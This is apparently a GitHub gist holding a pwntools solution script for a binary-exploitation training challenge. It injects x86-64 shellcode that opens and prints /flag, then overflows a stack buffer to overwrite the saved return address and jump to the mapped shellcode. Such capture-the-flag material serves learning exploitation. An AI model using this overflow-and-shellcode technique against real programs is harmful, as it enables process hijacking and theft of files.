@morkev
Last active February 18, 2025 09:01
Hijacking control flow to a memory-mapped shellcode that you input separately.
from pwn import *

# Stage 1: shellcode that opens /flag, reads it, writes it to stdout and exits.
# The absolute path means it does not depend on the process's working directory.
shellcode = asm('''
/* Open flag file */
mov rax, 2 /* SYS_open */
lea rdi, [rip+flag] /* filename, RIP-relative so the code is position-independent */
xor rsi, rsi /* O_RDONLY */
syscall
/* Read flag content */
mov rdi, rax /* fd returned by open */
mov rax, 0 /* SYS_read */
sub rsp, 100 /* buffer space on the stack */
mov rsi, rsp /* buffer */
mov rdx, 100 /* count */
syscall
/* Write to stdout */
mov rdx, rax /* count = bytes actually read */
mov rax, 1 /* SYS_write */
mov rdi, 1 /* stdout */
mov rsi, rsp /* buffer */
syscall
/* Exit cleanly */
mov rax, 60 /* SYS_exit */
xor rdi, rdi /* status = 0 */
syscall
flag:
.string "/flag" /* absolute path, NUL-terminated by .string */
''', arch='amd64')

p = process('/challenge/binary-exploitation-hijack-to-mmap-shellcode-w')

# Stage 2: the challenge reads the shellcode first and maps it into memory.
p.send(shellcode)
p.recvuntil(b'Press enter to continue!')
p.sendline()

# Stage 3: overflow the stack buffer to overwrite the saved return address.
# From the stack dump I received:
# - Buffer starts at rsp+0x20
# - Return address is at 0x7fff539fd8c8
# - Buffer starts at 0x7fff539fd890
# - So offset is 0x38 bytes (0x8c8 - 0x890 = 0x38)
payload = b'A' * 0x38 # Padding up to the saved return address
payload += p64(0x2a55b000) # Address where shellcode is mapped
p.sendline(payload)

print(p.recvall().decode())